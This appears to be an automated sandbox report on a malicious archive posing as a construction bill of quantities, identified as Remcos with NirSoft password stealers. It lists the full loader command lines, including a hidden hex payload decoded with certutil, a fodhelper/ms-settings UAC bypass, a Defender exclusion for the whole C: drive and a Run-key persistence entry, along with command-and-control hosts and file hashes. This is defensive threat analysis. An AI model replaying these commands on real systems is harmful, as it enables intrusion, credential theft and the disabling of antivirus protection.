Analysis Overview
SHA256
bdab83d4833d93e87768a40e776dbac732b769b1e191217ce17f5aaf0bdc259d
Threat Level: Known bad
The file BOQ_47864594_AL Madheef Project_2024_05_13.zip was found to be: Known bad.
Malicious Activity Summary
Remcos
Nirsoft
NirSoft MailPassView
NirSoft WebBrowserPassView
Loads dropped DLL
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
Adds Run key to start application
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Enumerates physical storage devices
Kills process with taskkill
Suspicious behavior: MapViewOfSection
Modifies registry class
Suspicious behavior: CmdExeWriteProcessMemorySpam
Script User-Agent
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-13 16:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-13 16:22
Reported
2024-05-13 16:25
Platform
win7-20240508-en
Max time kernel
142s
Max time network
122s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\ger.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\kn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\Ping_c.pif | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Public\alpha.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open\command | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open | C:\Users\Public\ger.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" | C:\Users\Public\ger.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Libraries\Ping_c.pif | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\BOQ_47864594_AL Madheef Project_2024_05_13.cmd"
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BOQ_47864594_AL Madheef Project_2024_05_13.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BOQ_47864594_AL Madheef Project_2024_05_13.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
Network
Files
\Users\Public\alpha.exe
| MD5 | 5746bd7e255dd6a8afa06f7c42c1ba41 |
| SHA1 | 0f3c4ff28f354aede202d54e9d1c5529a3bf87d8 |
| SHA256 | db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386 |
| SHA512 | 3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e |
\Users\Public\kn.exe
| MD5 | ec1fd3050dbc40ec7e87ab99c7ca0b03 |
| SHA1 | ae7fdfc29f4ef31e38ebf381e61b503038b5cb35 |
| SHA256 | 1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3 |
| SHA512 | 4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2 |
\Users\Public\xkn.exe
| MD5 | 852d67a27e454bd389fa7f02a8cbe23f |
| SHA1 | 5330fedad485e0e4c23b2abe1075a1f984fde9fc |
| SHA256 | a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8 |
| SHA512 | 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d |
C:\Users\Public\ger.exe
| MD5 | 9d0b3066fe3d1fd345e86bc7bcced9e4 |
| SHA1 | e05984a6671fcfecbc465e613d72d42bda35fd90 |
| SHA256 | 4e66b857b7010db8d4e4e28d73eb81a99bd6915350bb9a63cd86671051b22f0e |
| SHA512 | d773ca3490918e26a42f90f5c75a0728b040e414d03599ca70e99737a339858e9f0c99711bed8eeebd5e763d10d45e19c4e7520ee62d6957bc9799fd62d4e119 |
C:\Users\Public\Ping_c.mp4
| MD5 | bba7d06647e85df8c8f2d38e662019ab |
| SHA1 | 18f8b97c1dbf34d7f5564a1cf3344003b7ad2f26 |
| SHA256 | 604b7c9f8e98ebc2b14ef486e35304754fd21ecd667f8c2780a0239182371c6e |
| SHA512 | dbf643c716d737e2d73b43b68debcd587c8ffb0354a8035c3af38d8df1868af07c8c5eaaa3e2c8a1d22b6a54528d64ebaf0416ae368a11be16bc13a93f892082 |
C:\Users\Public\Libraries\Ping_c.pif
| MD5 | f0f18b73b40316ee5a0b5bf847261b94 |
| SHA1 | 50ad93aed2b14b696d1e7ce4fbc5e9529522386e |
| SHA256 | d3bf0cabd6ac5c52e6a7dde6b3853d5c6963b839a611ea310a883dfb11e96087 |
| SHA512 | cd01aa45eeb1b34ce024b55f8c9123126c5892595c2ea54d5db6de6d7df8eb085476e0788ad8120d9f9f998d831bf751bdc4e6839736cbb88957302e8c9db813 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-13 16:22
Reported
2024-05-13 16:25
Platform
win10v2004-20240508-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Remcos
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Windows \System32\per.exe | N/A |
Executes dropped EXE
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rzpcyblh = "C:\\Users\\Public\\Rzpcyblh.url" | C:\Users\Public\Libraries\Ping_c.pif | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5080 set thread context of 3340 | N/A | C:\Users\Public\Libraries\Ping_c.pif | C:\Users\Public\Libraries\hlbycpzR.pif |
| PID 3340 set thread context of 724 | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | C:\Users\Public\Libraries\hlbycpzR.pif |
| PID 3340 set thread context of 4668 | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | C:\Users\Public\Libraries\hlbycpzR.pif |
| PID 3340 set thread context of 1972 | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | C:\Users\Public\Libraries\hlbycpzR.pif |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open\command | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell | C:\Users\Public\ger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open | C:\Users\Public\ger.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\"" | C:\Users\Public\ger.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\xkn.exe | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
| N/A | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\xkn.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Public\Libraries\hlbycpzR.pif | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\BOQ_47864594_AL Madheef Project_2024_05_13.cmd"
C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BOQ_47864594_AL Madheef Project_2024_05_13.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\BOQ_47864594_AL Madheef Project_2024_05_13.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
C:\Windows \System32\per.exe
"C:\\Windows \\System32\\per.exe"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Rzpcyblh.PIF
C:\Users\Public\Libraries\hlbycpzR.pif
C:\Users\Public\Libraries\hlbycpzR.pif
C:\Users\Public\Libraries\hlbycpzR.pif
C:\Users\Public\Libraries\hlbycpzR.pif /stext "C:\Users\Admin\AppData\Local\Temp\xnqchqzrpwfawvtvriacir"
C:\Users\Public\Libraries\hlbycpzR.pif
C:\Users\Public\Libraries\hlbycpzR.pif /stext "C:\Users\Admin\AppData\Local\Temp\ihvuhajtdexfzbpzisndtwvvab"
C:\Users\Public\Libraries\hlbycpzR.pif
C:\Users\Public\Libraries\hlbycpzR.pif /stext "C:\Users\Admin\AppData\Local\Temp\sjbnitunzmpkjqddrdixwjhebpylh"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.66.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| NL | 23.62.61.113:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 113.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | graffae-my.sharepoint.com | udp |
| US | 13.107.136.10:443 | graffae-my.sharepoint.com | tcp |
| US | 13.107.136.10:443 | graffae-my.sharepoint.com | tcp |
| US | 8.8.8.8:53 | tasstrading.com | udp |
| US | 45.42.140.13:443 | tasstrading.com | tcp |
| US | 8.8.8.8:53 | 10.136.107.13.in-addr.arpa | udp |
| US | 45.42.140.13:443 | tasstrading.com | tcp |
| US | 8.8.8.8:53 | pentester0.accesscam.org | udp |
| MY | 103.186.117.159:56796 | pentester0.accesscam.org | tcp |
| US | 8.8.8.8:53 | 13.140.42.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.53.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | archived.zapto.org | udp |
| MY | 103.186.117.159:56797 | archived.zapto.org | tcp |
| US | 8.8.8.8:53 | honeypotresearchteam.duckdns.org | udp |
| MY | 103.186.117.159:13922 | honeypotresearchteam.duckdns.org | tcp |
| US | 8.8.8.8:53 | 159.117.186.103.in-addr.arpa | udp |
| MY | 103.186.117.159:13922 | honeypotresearchteam.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Public\alpha.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
C:\Users\Public\kn.exe
| MD5 | bd8d9943a9b1def98eb83e0fa48796c2 |
| SHA1 | 70e89852f023ab7cde0173eda1208dbb580f1e4f |
| SHA256 | 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2 |
| SHA512 | 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b |
C:\Users\Public\xkn.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1vv2ggzk.03f.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Public\ger.exe
| MD5 | 227f63e1d9008b36bdbcc4b397780be4 |
| SHA1 | c0db341defa8ef40c03ed769a9001d600e0f4dae |
| SHA256 | c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d |
| SHA512 | 101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9 |
C:\Users\Public\Ping_c.mp4
| MD5 | bba7d06647e85df8c8f2d38e662019ab |
| SHA1 | 18f8b97c1dbf34d7f5564a1cf3344003b7ad2f26 |
| SHA256 | 604b7c9f8e98ebc2b14ef486e35304754fd21ecd667f8c2780a0239182371c6e |
| SHA512 | dbf643c716d737e2d73b43b68debcd587c8ffb0354a8035c3af38d8df1868af07c8c5eaaa3e2c8a1d22b6a54528d64ebaf0416ae368a11be16bc13a93f892082 |
C:\Windows \System32\per.exe
| MD5 | 85018be1fd913656bc9ff541f017eacd |
| SHA1 | 26d7407931b713e0f0fa8b872feecdb3cf49065a |
| SHA256 | c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5 |
| SHA512 | 3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459 |
C:\Users\Public\Libraries\Ping_c.pif
| MD5 | f0f18b73b40316ee5a0b5bf847261b94 |
| SHA1 | 50ad93aed2b14b696d1e7ce4fbc5e9529522386e |
